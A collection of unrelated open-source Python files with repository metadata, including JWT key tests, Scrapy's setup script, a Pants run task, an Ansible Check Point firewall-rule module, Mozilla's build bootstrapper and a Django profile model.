self.assertEqual(pem[-1], '-----END PUBLIC KEY-----') def test_rsa_fingerprint(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) self.assertEqual(key.fingerprint, '53c5b68c5ecba3e25df3f8326de6c0b0befb67e9217651a2f40e388f6567f056') def test_ed25519_fingerprint(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) self.assertEqual(key.fingerprint, 'cb10cd75c2eacf7aa2b5195bef9838cccd9d2ae4938601178808cb881b68ec72') def test_rsa_allowed_algorithms(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_RSA) self.assertIsNone(exc) self.assertEqual(key.allowed_algorithms, [ 'RS512', 'RS384', 'RS256', ]) def test_ed25519_allowed_algorithms(self): exc, key = keys.PublicKey.load_serialized_public_key(data.PEM_PUBLIC_ED25519) self.assertIsNone(exc) self.assertEqual(key.allowed_algorithms, [ 'EdDSA', ]) def test_unknown_key_type(self): with self.assertRaises(TypeError): keys.PublicKey.from_cryptography_pubkey(mock.MagicMock()) class PrivateKeyTest(TestCase): def test_generate_rsa(self): private = keys.RSAPrivateKey.generate() self.assertIsInstance(private, keys.RSAPrivateKey) self.assertIsInstance(private.public_key, keys.RSAPublicKey) def test_generate_ed25519(self): private = keys.Ed25519PrivateKey.generate() self.assertIsInstance(private, keys.Ed25519PrivateKey) self.assertIsInstance(private.public_key,
keys.Ed25519PublicKey) def test_load_rsa_from_file(self): base = os.path.dirname(__file__) filepath = os.path.join(base, 'fixtures/dummy_rsa.privkey') private = keys.RSAPrivateKey.load_pem_from_file(filepath) self.assertIsInstance(private, keys.RSAPrivateKey) def test_load_rsa_from_file_encrypted(self): base = os.path.dirname(__file__) filepath = os.path.join(base, 'fixtures/dummy_rsa_encrypted.privkey') private = keys.RSAPrivateKey.load_pem_from_file(filepath, password=b'password') self.assertIsInstance(private, keys.RSAPrivateKey) def test_load_rsa(self): priv1 = keys.RSAPrivateKey.generate() priv2 = keys.RSAPrivateKey.load_pem(priv1.as_pem) self.assertEqual(priv2.as_pem, priv1.as_pem) def test_load_ed25519(self): priv1 = keys.Ed25519PrivateKey.generate() priv2 = keys.Ed25519PrivateKey.load_pem(priv1.as_pem) self.assertEqual(priv2.as_pem, priv1.as_pem) def test_rsa_as_pem(self): private = keys.RSAPrivateKey.generate() pem = private.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PRIVATE KEY-----') self.assertEqual(pem[-1], '-----END PRIVATE KEY-----') def test_ed25519_as_pem(self): private = keys.Ed25519PrivateKey.generate() pem = private.as_pem.decode().strip().split('\n') self.assertEqual(pem[0], '-----BEGIN PRIVATE KEY-----') self.assertEqual(pem[-1], '-----END PRIVATE KEY-----') def test_unknown_key_type(self): with self.assertRaises(TypeError): keys.PrivateKey.from_cryptography_privkey(mock.MagicMock())
crgwbr/asymmetric_jwt_auth
src/asymmetric_jwt_auth/tests/test_keys.py
Python
isc
5,861
from os.path import dirname, join from pkg_resources import parse_version from setuptools import setup, find_packages, __version__ as setuptools_version with open(join(dirname(__file__), 'scrapy/VERSION'), 'rb') as f: version = f.read().decode('ascii').strip() def has_environment_marker_platform_impl_support(): """Code extracted from 'pytest/setup.py' https://github.com/pytest-dev/pytest/blob/7538680c/setup.py#L31 The first known release to support environment marker with range operators it is 18.5, see: https://setuptools.readthedocs.io/en/latest/history.html#id235 """ return parse_version(setuptools_version) >= parse_version('18.5') install_requires = [ 'Twisted>=17.9.0', 'cryptography>=2.0', 'cssselect>=0.9.1', 'itemloaders>=1.0.1', 'parsel>=1.5.0', 'PyDispatcher>=2.0.5', 'pyOpenSSL>=16.2.0', 'queuelib>=1.4.2', 'service_identity>=16.0.0', 'w3lib>=1.17.0', 'zope.interface>=4.1.3', 'protego>=0.1.15', 'itemadapter>=0.1.0', ] extras_require = {} if has_environment_marker_platform_impl_support(): extras_require[':platform_python_implementation == "CPython"'] = [ 'lxml>=3.5.0', ] extras_require[':platform_python_implementation == "PyPy"'] = [ # Earlier lxml versions are affected by # https://foss.heptapod.net/pypy/pypy/-/issues/2498, # which was fixed in Cython 0.26, released on 2017-06-19, and used to # generate the C headers of lxml release tarballs published since then, the # first of which was: 'lxml>=4.0.0', 'PyPyDispatcher>=2.1.0', ] else: install_requires.append('lxml>=3.5.0') setup( name='Scrapy', version=version, url='https://scrapy.org', project_urls = { 'Documentation': 'https://docs.scrapy.org/', 'Source': 'https://github.com/scrapy/scrapy', 'Tracker': 'https://github.com/scrapy/scrapy/issues', }, description='A high-level Web Crawling and Web Scraping framework', long_description=open('README.rst').read(), author='Scrapy developers', maintainer='Pablo Hoffman', maintainer_email='[email protected]', license='BSD', packages=find_packages(exclude=('tests', 'tests.*')), include_package_data=True, zip_safe=False, entry_points={ 'console_scripts': ['scrapy = scrapy.cmdline:execute'] }, classifiers=[ 'Framework :: Scrapy', 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Software Development :: Libraries :: Application Frameworks', 'Topic :: Software Development :: Libraries :: Python Modules', ], python_requires='>=3.6', install_requires=install_requires, extras_require=extras_require, )
starrify/scrapy
setup.py
Python
bsd-3-clause
3,363
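The has_environment_marker_platform_impl_support() gate in the setup.py above comes down to a PEP 440 version comparison on the installed setuptools; for example (version strings here are only illustrative):

from pkg_resources import parse_version

print(parse_version('40.8.0') >= parse_version('18.5'))  # True: extras_require environment markers are usable
print(parse_version('18.4') >= parse_version('18.5'))    # False: fall back to plain install_requires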
from unittest import TestCase
samratashok87/Rammbock
utest/test_templates/__init__.py
Python
apache-2.0
30
# # Copyright 2012 New Dream Network, LLC (DreamHost) # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg # Register options for the service OPTS = [ cfg.StrOpt('paste_config', default='api-paste.ini', help="Configuration file for WSGI definition of API."), cfg.StrOpt( 'auth_mode', default="keystone", help="Authentication mode to use. Unset to disable authentication"), ]
openstack/aodh
aodh/api/__init__.py
Python
apache-2.0
960
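A minimal sketch of how option definitions like OPTS above are typically consumed with oslo.config (the ConfigOpts instance, empty argv and project name are illustrative, not aodh's actual wiring):

from oslo_config import cfg
from aodh.api import OPTS

conf = cfg.ConfigOpts()
conf.register_opts(OPTS)        # registers paste_config / auth_mode in [DEFAULT]
conf(args=[], project='aodh')   # parse no CLI args, keep the defaults
print(conf.paste_config, conf.auth_mode)  # -> api-paste.ini keystone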
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import logging from pants.backend.jvm.targets.jvm_binary import JvmApp, JvmBinary from pants.backend.jvm.tasks.jvm_task import JvmTask from pants.base.exceptions import TaskError from pants.base.workunit import WorkUnit from pants.fs.fs import expand_path from pants.java.executor import CommandLineGrabber from pants.java.util import execute_java from pants.util.dirutil import safe_open _CWD_NOT_PRESENT = 'CWD NOT PRESENT' logger = logging.getLogger(__name__) def is_binary(target): return isinstance(target, JvmBinary) class JvmRun(JvmTask): @classmethod def register_options(cls, register): super(JvmRun, cls).register_options(register) register('--only-write-cmd-line', metavar='<file>', help='Instead of running, just write the cmd line to this file.') # Note the unusual registration pattern. This is so we can support three cases: # --cwd=<path> # --cwd (defaults to the value of 'const', which is None here) # No explicit --cwd at all (defaults to the value of 'default') register('--cwd', default=_CWD_NOT_PRESENT, nargs='?', help='Set the working directory. If no argument is passed, use the target path.') @classmethod def supports_passthru_args(cls): return True @classmethod def prepare(cls, options, round_manager): super(JvmRun, cls).prepare(options, round_manager) # TODO(John Sirois): these are fake requirements in order to force compile run before this # goal. Introduce a RuntimeClasspath product for JvmCompile and PrepareResources to populate # and depend on that. # See: https://github.com/pantsbuild/pants/issues/310 round_manager.require_data('resources_by_target') round_manager.require_data('classes_by_target') def __init__(self, *args, **kwargs): super(JvmRun, self).__init__(*args, **kwargs) self.only_write_cmd_line = self.get_options().only_write_cmd_line self.args.extend(self.get_passthru_args()) def execute(self): # The called binary may block for a while, allow concurrent pants activity during this pants # idle period. # # TODO(John Sirois): refactor lock so that I can do: # with self.context.lock.yield(): # - blocking code # # Currently re-acquiring the lock requires a path argument that was set up by the goal # execution engine. I do not want task code to learn the lock location. # http://jira.local.twitter.com/browse/AWESOME-1317 target = self.require_single_root_target() working_dir = None cwd_opt = self.get_options().cwd if cwd_opt != _CWD_NOT_PRESENT: working_dir = self.get_options().cwd if not working_dir: working_dir = target.address.spec_path logger.debug ("Working dir is {0}".format(working_dir)) if isinstance(target, JvmApp): binary = target.binary else: binary = target # We can't throw if binary isn't a JvmBinary, because perhaps we were called on a # python_binary, in which case we have to no-op and let python_run do its thing. # TODO(benjy): Some more elegant way to coordinate how tasks claim targets. 
if isinstance(binary, JvmBinary): executor = CommandLineGrabber() if self.only_write_cmd_line else None self.context.release_lock() result = execute_java( classpath=(self.classpath(confs=self.confs)), main=binary.main, executor=executor, jvm_options=self.jvm_options, args=self.args, workunit_factory=self.context.new_workunit, workunit_name='run', workunit_labels=[WorkUnit.RUN], cwd=working_dir, ) if self.only_write_cmd_line: with safe_open(expand_path(self.only_write_cmd_line), 'w') as outfile: outfile.write(' '.join(executor.cmd)) elif result != 0: raise TaskError('java %s ... exited non-zero (%i)' % (binary.main, result), exit_code=result)
tejal29/pants
src/python/pants/backend/jvm/tasks/jvm_run.py
Python
apache-2.0
4,234
# -*- encoding: utf-8 -*- # Module iainfgen from numpy import * def iainfgen(f, Iab): from iaunion import iaunion from iadil import iadil from ianeg import ianeg A, Bc = Iab y = iaunion( iadil(f, A), iadil( ianeg(f), Bc)) return y
mariecpereira/IA369Z
deliver/ia870/iainfgen.py
Python
mit
261
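iainfgen above builds the inf-generating (dual hit-or-miss) operator as the union of two dilations, dil(f, A) ∪ dil(¬f, Bc). A rough stand-in using scipy.ndimage instead of the ia870 helpers (the image and structuring elements are made up and symmetric, so dilation conventions agree):

import numpy as np
from scipy.ndimage import binary_dilation

f = np.zeros((5, 5), bool)
f[2, 2] = True                                            # single foreground pixel
A = np.array([[0, 1, 0], [1, 1, 1], [0, 1, 0]], bool)     # lower bound of the interval
Bc = np.array([[1, 0, 1], [0, 0, 0], [1, 0, 1]], bool)    # complement of the upper bound

y = binary_dilation(f, A) | binary_dilation(~f, Bc)       # union of the two dilations
print(y.astype(int))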
#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # from __future__ import (absolute_import, division, print_function) __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'network'} DOCUMENTATION = """ --- module: checkpoint_access_rule short_description: Manages access rules on Check Point over Web Services API description: - Manages access rules on Check Point devices including creating, updating, removing access rule objects. All operations are performed over Web Services API. version_added: "2.8" author: "Ansible by Red Hat (@rcarrillocruz)" options: name: description: - Name of the access rule. type: str layer: description: - Layer to attach the access rule to. required: True type: str position: description: - Position of the access rule. type: str source: description: - Source object of the access rule. type: str destination: description: - Destination object of the access rule. type: str action: description: - Action of the access rule (accept, drop, inform, etc). type: str default: drop enabled: description: - Enabled or disabled flag. type: bool default: True state: description: - State of the access rule (present or absent). Defaults to present. type: str default: present auto_publish_session: description: - Publish the current session if changes have been performed after the task completes. type: bool default: 'yes' auto_install_policy: description: - Install the package policy if changes have been performed after the task completes. type: bool default: 'yes' policy_package: description: - Package policy name to be installed. type: str default: 'standard' targets: description: - Targets to install the package policy on. type: list """ EXAMPLES = """ - name: Create access rule checkpoint_access_rule: layer: Network name: "Drop attacker" position: top source: attacker destination: Any action: Drop - name: Delete access rule checkpoint_access_rule: layer: Network name: "Drop attacker" """ RETURN = """ checkpoint_access_rules: description: The checkpoint access rule object created or updated. returned: always, except when deleting the access rule.
type: list """ from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.connection import Connection from ansible.module_utils.network.checkpoint.checkpoint import checkpoint_argument_spec, publish, install_policy import json def get_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] payload = {'name': name, 'layer': layer} code, response = connection.send_request('/web_api/show-access-rule', payload) return code, response def create_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] position = module.params['position'] source = module.params['source'] destination = module.params['destination'] action = module.params['action'] payload = {'name': name, 'layer': layer, 'position': position, 'source': source, 'destination': destination, 'action': action} code, response = connection.send_request('/web_api/add-access-rule', payload) return code, response def update_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] position = module.params['position'] source = module.params['source'] destination = module.params['destination'] action = module.params['action'] enabled = module.params['enabled'] payload = {'name': name, 'layer': layer, 'position': position, 'source': source, 'destination': destination, 'action': action, 'enabled': enabled} code, response = connection.send_request('/web_api/set-access-rule', payload) return code, response def delete_access_rule(module, connection): name = module.params['name'] layer = module.params['layer'] payload = {'name': name, 'layer': layer, } code, response = connection.send_request('/web_api/delete-access-rule', payload) return code, response def needs_update(module, access_rule): res = False if module.params['source'] and module.params['source'] != access_rule['source'][0]['name']: res = True if module.params['destination'] and module.params['destination'] != access_rule['destination'][0]['name']: res = True if module.params['action'] != access_rule['action']['name']: res = True if module.params['enabled'] != access_rule['enabled']: res = True return res def main(): argument_spec = dict( name=dict(type='str', required=True), layer=dict(type='str'), position=dict(type='str'), source=dict(type='str'), destination=dict(type='str'), action=dict(type='str', default='drop'), enabled=dict(type='bool', default=True), state=dict(type='str', default='present') ) argument_spec.update(checkpoint_argument_spec) required_if = [('state', 'present', ('layer', 'position'))] module = AnsibleModule(argument_spec=argument_spec, required_if=required_if) connection = Connection(module._socket_path) code, response = get_access_rule(module, connection) result = {'changed': False} if module.params['state'] == 'present': if code == 200: if needs_update(module, response): code, response = update_access_rule(module, connection) if code != 200: module.fail_json(msg=response) if module.params['auto_publish_session']: publish(connection) if module.params['auto_install_policy']: install_policy(connection, module.params['policy_package'], module.params['targets']) result['changed'] = True result['checkpoint_access_rules'] = response else: pass elif code == 404: code, response = create_access_rule(module, connection) if code != 200: module.fail_json(msg=response) if module.params['auto_publish_session']: publish(connection) if module.params['auto_install_policy']: install_policy(connection, module.params['policy_package'], 
module.params['targets']) result['changed'] = True result['checkpoint_access_rules'] = response else: if code == 200: code, response = delete_access_rule(module, connection) if code != 200: module.fail_json(msg=response) if module.params['auto_publish_session']: publish(connection) if module.params['auto_install_policy']: install_policy(connection, module.params['policy_package'], module.params['targets']) result['changed'] = True result['checkpoint_access_rules'] = response elif code == 404: pass result['checkpoint_session_uid'] = connection.get_session_uid() module.exit_json(**result) if __name__ == '__main__': main()
hyperized/ansible
lib/ansible/modules/network/check_point/checkpoint_access_rule.py
Python
gpl-3.0
8,285
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.

# If we add unicode_literals, Python 2.6.1 (required for OS X 10.6) breaks.
from __future__ import print_function

import platform
import sys
import os.path
import subprocess

# Don't forget to add new mozboot modules to the bootstrap download
# list in bin/bootstrap.py!
from mozboot.centosfedora import CentOSFedoraBootstrapper
from mozboot.debian import DebianBootstrapper
from mozboot.freebsd import FreeBSDBootstrapper
from mozboot.gentoo import GentooBootstrapper
from mozboot.osx import OSXBootstrapper
from mozboot.openbsd import OpenBSDBootstrapper
from mozboot.archlinux import ArchlinuxBootstrapper
from mozboot.windows import WindowsBootstrapper
from mozboot.util import (
    get_state_dir,
)

APPLICATION_CHOICE = '''
Please choose the version of Firefox you want to build:
%s

Note: (For Firefox for Android)

The Firefox for Android front-end is built using Java, the Android
Platform SDK, JavaScript, HTML, and CSS. If you want to work on the
look-and-feel of Firefox for Android, you want "Firefox for Android
Artifact Mode".

Firefox for Android is built on top of the Gecko technology platform.
Gecko is Mozilla's web rendering engine, similar to Edge, Blink, and
WebKit. Gecko is implemented in C++ and JavaScript. If you want to work
on web rendering, you want "Firefox for Android".

If you don't know what you want, start with just "Firefox for Android
Artifact Mode". Your builds will be much shorter than if you build Gecko
as well. But don't worry! You can always switch configurations later.

You can learn more about Artifact mode builds at
https://developer.mozilla.org/en-US/docs/Artifact_builds.

Your choice: '''

APPLICATIONS_LIST = [
    ('Firefox for Desktop', 'browser'),
    ('Firefox for Android Artifact Mode', 'mobile_android_artifact_mode'),
    ('Firefox for Android', 'mobile_android'),
]

# This is a workaround for the fact that we must support python2.6 (which has
# no OrderedDict)
APPLICATIONS = dict(
    browser=APPLICATIONS_LIST[0],
    mobile_android_artifact_mode=APPLICATIONS_LIST[1],
    mobile_android=APPLICATIONS_LIST[2],
)

STATE_DIR_INFO = '''
The Firefox build system and related tools store shared, persistent state
in a common directory on the filesystem. On this machine, that directory is:

  {statedir}

If you would like to use a different directory, hit CTRL+c and set the
MOZBUILD_STATE_PATH environment variable to the directory you'd like to
use and re-run the bootstrapper.

Would you like to create this directory?

  1. Yes
  2. No

Your choice: '''

FINISHED = '''
Your system should be ready to build %s!
'''

SOURCE_ADVERTISE = '''
Source code can be obtained by running

    hg clone https://hg.mozilla.org/mozilla-unified

Or, if you prefer Git, you should install git-cinnabar, and follow the
instruction here to clone from the Mercurial repository:

    https://github.com/glandium/git-cinnabar/wiki/Mozilla:-A-git-workflow-for-Gecko-development

Or, if you really prefer vanilla flavor Git:

    git clone https://git.mozilla.org/integration/gecko-dev.git
'''

CONFIGURE_MERCURIAL = '''
Mozilla recommends a number of changes to Mercurial to enhance your
experience with it.

Would you like to run a configuration wizard to ensure Mercurial is
optimally configured?

  1. Yes
  2. No

Please enter your reply: '''.lstrip()

CLONE_MERCURIAL = '''
If you would like to clone the canonical Mercurial repository, please
enter the destination path below.

(If you prefer to use Git, leave this blank.)

Destination directory for Mercurial clone (leave empty to not clone): '''.lstrip()

DEBIAN_DISTROS = (
    'Debian',
    'debian',
    'Ubuntu',
    # Most Linux Mint editions are based on Ubuntu. One is based on Debian.
    # The difference is reported in dist_id from platform.linux_distribution.
    # But it doesn't matter since we share a bootstrapper between Debian and
    # Ubuntu.
    'Mint',
    'LinuxMint',
    'Elementary OS',
    'Elementary',
    '"elementary OS"',
)


class Bootstrapper(object):
    """Main class that performs system bootstrap."""

    def __init__(self, finished=FINISHED, choice=None, no_interactive=False,
                 hg_configure=False):
        self.instance = None
        self.finished = finished
        self.choice = choice
        self.hg_configure = hg_configure
        cls = None
        args = {'no_interactive': no_interactive}

        if sys.platform.startswith('linux'):
            distro, version, dist_id = platform.linux_distribution()

            if distro in ('CentOS', 'CentOS Linux', 'Fedora'):
                cls = CentOSFedoraBootstrapper
                args['distro'] = distro
            elif distro in DEBIAN_DISTROS:
                cls = DebianBootstrapper
            elif distro == 'Gentoo Base System':
                cls = GentooBootstrapper
            elif os.path.exists('/etc/arch-release'):
                # Even on archlinux, platform.linux_distribution() returns ['','','']
                cls = ArchlinuxBootstrapper
            else:
                raise NotImplementedError('Bootstrap support for this Linux '
                                          'distro not yet available.')

            args['version'] = version
            args['dist_id'] = dist_id

        elif sys.platform.startswith('darwin'):
            # TODO Support Darwin platforms that aren't OS X.
            osx_version = platform.mac_ver()[0]

            cls = OSXBootstrapper
            args['version'] = osx_version

        elif sys.platform.startswith('openbsd'):
            cls = OpenBSDBootstrapper
            args['version'] = platform.uname()[2]

        elif sys.platform.startswith('dragonfly') or \
                sys.platform.startswith('freebsd'):
            cls = FreeBSDBootstrapper
            args['version'] = platform.release()
            args['flavor'] = platform.system()

        elif sys.platform.startswith('win32') or sys.platform.startswith('msys'):
            cls = WindowsBootstrapper

        if cls is None:
            raise NotImplementedError('Bootstrap support is not yet available '
                                      'for your OS.')

        self.instance = cls(**args)

    def bootstrap(self):
        if self.choice is None:
            # Like ['1. Firefox for Desktop', '2. Firefox for Android Artifact Mode', ...].
            labels = ['%s. %s' % (i + 1, name) for (i, (name, _)) in enumerate(APPLICATIONS_LIST)]
            prompt = APPLICATION_CHOICE % '\n'.join(labels)
            prompt_choice = self.instance.prompt_int(prompt=prompt, low=1, high=len(APPLICATIONS))
            name, application = APPLICATIONS_LIST[prompt_choice-1]
        elif self.choice not in APPLICATIONS.keys():
            raise Exception('Please pick a valid application choice: (%s)' %
                            '/'.join(APPLICATIONS.keys()))
        else:
            name, application = APPLICATIONS[self.choice]

        self.instance.install_system_packages()

        # Like 'install_browser_packages' or 'install_mobile_android_packages'.
        getattr(self.instance, 'install_%s_packages' % application)()

        hg_installed, hg_modern = self.instance.ensure_mercurial_modern()
        self.instance.ensure_python_modern()

        # The state directory code is largely duplicated from mach_bootstrap.py.
        # We can't easily import mach_bootstrap.py because the bootstrapper may
        # run in self-contained mode and only the files in this directory will
        # be available. We /could/ refactor parts of mach_bootstrap.py to be
        # part of this directory to avoid the code duplication.
        state_dir, _ = get_state_dir()

        if not os.path.exists(state_dir):
            if not self.instance.no_interactive:
                choice = self.instance.prompt_int(
                    prompt=STATE_DIR_INFO.format(statedir=state_dir),
                    low=1,
                    high=2)

                if choice == 1:
                    print('Creating global state directory: %s' % state_dir)
                    os.makedirs(state_dir, mode=0o770)

        state_dir_available = os.path.exists(state_dir)

        # Possibly configure Mercurial if the user wants to.
        # TODO offer to configure Git.
        if hg_installed and state_dir_available:
            configure_hg = False
            if not self.instance.no_interactive:
                choice = self.instance.prompt_int(prompt=CONFIGURE_MERCURIAL,
                                                  low=1, high=2)
                if choice == 1:
                    configure_hg = True
            else:
                configure_hg = self.hg_configure

            if configure_hg:
                configure_mercurial(self.instance.which('hg'), state_dir)

        # Offer to clone if we're not inside a clone.
        checkout_type = current_firefox_checkout(check_output=self.instance.check_output,
                                                 hg=self.instance.which('hg'))
        have_clone = False

        if checkout_type:
            have_clone = True
        elif hg_installed and not self.instance.no_interactive:
            dest = raw_input(CLONE_MERCURIAL)
            dest = dest.strip()
            if dest:
                dest = os.path.expanduser(dest)
                have_clone = clone_firefox(self.instance.which('hg'), dest)

        if not have_clone:
            print(SOURCE_ADVERTISE)

        print(self.finished % name)

        # Like 'suggest_browser_mozconfig' or 'suggest_mobile_android_mozconfig'.
        getattr(self.instance, 'suggest_%s_mozconfig' % application)()


def update_vct(hg, root_state_dir):
    """Ensure version-control-tools in the state directory is up to date."""
    vct_dir = os.path.join(root_state_dir, 'version-control-tools')

    # Ensure the latest revision of version-control-tools is present.
    update_mercurial_repo(hg, 'https://hg.mozilla.org/hgcustom/version-control-tools',
                          vct_dir, '@')

    return vct_dir


def configure_mercurial(hg, root_state_dir):
    """Run the Mercurial configuration wizard."""
    vct_dir = update_vct(hg, root_state_dir)

    # Run the config wizard from v-c-t.
    args = [
        hg,
        '--config', 'extensions.configwizard=%s/hgext/configwizard' % vct_dir,
        'configwizard',
    ]
    subprocess.call(args)


def update_mercurial_repo(hg, url, dest, revision):
    """Perform a clone/pull + update of a Mercurial repository."""
    args = [hg]

    # Disable common extensions whose older versions may cause `hg`
    # invocations to abort.
    disable_exts = [
        'bzexport',
        'bzpost',
        'firefoxtree',
        'hgwatchman',
        'mozext',
        'mqext',
        'qimportbz',
        'push-to-try',
        'reviewboard',
    ]
    for ext in disable_exts:
        args.extend(['--config', 'extensions.%s=!' % ext])

    if os.path.exists(dest):
        args.extend(['pull', url])
        cwd = dest
    else:
        args.extend(['clone', '--noupdate', url, dest])
        cwd = '/'

    print('=' * 80)
    print('Ensuring %s is up to date at %s' % (url, dest))

    try:
        subprocess.check_call(args, cwd=cwd)
        subprocess.check_call([hg, 'update', '-r', revision], cwd=dest)
    finally:
        print('=' * 80)


def clone_firefox(hg, dest):
    """Clone the Firefox repository to a specified destination."""
    print('Cloning Firefox Mercurial repository to %s' % dest)

    # We create an empty repo then modify the config before adding data.
    # This is necessary to ensure storage settings are optimally
    # configured.
    args = [
        hg,
        # The unified repo is generaldelta, so ensure the client is as
        # well.
        '--config', 'format.generaldelta=true',
        'init',
        dest
    ]
    res = subprocess.call(args)
    if res:
        print('unable to create destination repo; please try cloning manually')
        return False

    # Strictly speaking, this could overwrite a config based on a template
    # the user has installed. Let's pretend this problem doesn't exist
    # unless someone complains about it.
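    # Seed the new repo's hgrc before pulling any data: set the default
    # pull path and bound the delta chain length (details in the comments
    # below).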
    with open(os.path.join(dest, '.hg', 'hgrc'), 'ab') as fh:
        fh.write('[paths]\n')
        fh.write('default = https://hg.mozilla.org/mozilla-unified\n')
        fh.write('\n')

        # The server uses aggressivemergedeltas which can blow up delta chain
        # length. This can cause performance to tank due to delta chains being
        # too long. Limit the delta chain length to something reasonable
        # to bound revlog read time.
        fh.write('[format]\n')
        fh.write('# This is necessary to keep performance in check\n')
        fh.write('maxchainlen = 10000\n')

    res = subprocess.call([hg, 'pull', 'https://hg.mozilla.org/mozilla-unified'], cwd=dest)
    print('')
    if res:
        print('error pulling; try running `hg pull https://hg.mozilla.org/mozilla-unified` manually')
        return False

    print('updating to "central" - the development head of Gecko and Firefox')
    res = subprocess.call([hg, 'update', '-r', 'central'], cwd=dest)
    if res:
        print('error updating; you will need to `hg update` manually')

    print('Firefox source code available at %s' % dest)
    return True


def current_firefox_checkout(check_output, hg=None):
    """Determine whether we're in a Firefox checkout.

    Returns one of None, ``git``, or ``hg``.
    """
    HG_ROOT_REVISIONS = set([
        # From mozilla-central.
        '8ba995b74e18334ab3707f27e9eb8f4e37ba3d29',
    ])

    path = os.getcwd()
    while path:
        hg_dir = os.path.join(path, '.hg')
        git_dir = os.path.join(path, '.git')
        if hg and os.path.exists(hg_dir):
            # Verify the hg repo is a Firefox repo by looking at rev 0.
            try:
                node = check_output([hg, 'log', '-r', '0', '-T', '{node}'], cwd=path)
                if node in HG_ROOT_REVISIONS:
                    return 'hg'
                # Else the root revision is different. There could be nested
                # repos. So keep traversing the parents.
            except subprocess.CalledProcessError:
                pass
        # TODO check git remotes or `git rev-parse -q --verify $sha1^{commit}`
        # for signs of Firefox.
        elif os.path.exists(git_dir):
            return 'git'

        path, child = os.path.split(path)
        if child == '':
            break

    return None
cstipkovic/spidermonkey-research
python/mozboot/mozboot/bootstrap.py
Python
mpl-2.0
14,641
from django.db import models

from ckeditor.fields import RichTextField
from solo.models import SingletonModel
from phonenumber_field import modelfields as phonenumber_models

from foti.models import Foto
from opere.models import Opera
from scritti.models import Scritto


class Profile(SingletonModel):
    name = models.CharField(
        max_length=255,
        blank=False,
    )
    _title = models.CharField(
        max_length=255,
        blank=True,
        help_text='Site title used in tab. Defaults to \'name\' if left blank.',
    )
    tagline = models.CharField(
        max_length=515,
        blank=True,
        help_text='Just a quick description (e.g. "Waddling through the world in search of adventure and snuggles" to go with "Nomad Penguin")',
    )
    intro = RichTextField(
        max_length=1024,
        blank=True,
    )

    bio_title = models.CharField(max_length=64, blank=True)
    bio_image = models.ImageField(upload_to='profile', blank=True)
    bio = RichTextField(
        max_length=4096,
        blank=True,
    )

    # Contact Info
    _contact_name = models.CharField(
        max_length=64,
        blank=True,
        help_text='Just in case you didn\'t use your real name up above. You can leave this blank if you want.',
    )
    address = models.CharField(
        max_length=64,
        blank=True,
    )
    city = models.CharField(
        max_length=64,
        blank=True,
    )
    state = models.CharField(
        max_length=64,
        blank=True,
    )
    country = models.CharField(
        max_length=128,
        blank=True
    )
    zip_code = models.CharField(
        max_length=16,
        blank=True,
        help_text='"Postal Code", technically.'
    )
    email = models.EmailField(
        max_length=128,
        blank=True
    )
    phone = phonenumber_models.PhoneNumberField(blank=True)

    website = models.URLField(blank=True, help_text='In case you have another one, I guess?')
    twitter = models.URLField(blank=True)
    facebook = models.URLField(blank=True)
    instagram = models.URLField(blank=True)
    linkedin = models.URLField(blank=True)
    pinterest = models.URLField(blank=True)
    tumblr = models.URLField(blank=True)

    # Someday we'll change the first one to accept Opera
    homepage_features = models.ManyToManyField(Scritto, related_name='facade_homepage_features', help_text='Max of 6!', blank=True)
    writing_features = models.ManyToManyField(Scritto, related_name='facade_writing_features', help_text='Max of 6!', blank=True)
    photo_features = models.ManyToManyField(Foto, related_name='facade_photo_features', help_text='Max of 6!', blank=True)

    @property
    def title(self):
        return self._title or self.name

    @property
    def fullname(self):
        return self._contact_name or self.name
mhotwagner/backstage
facade/models.py
Python
mit
2,837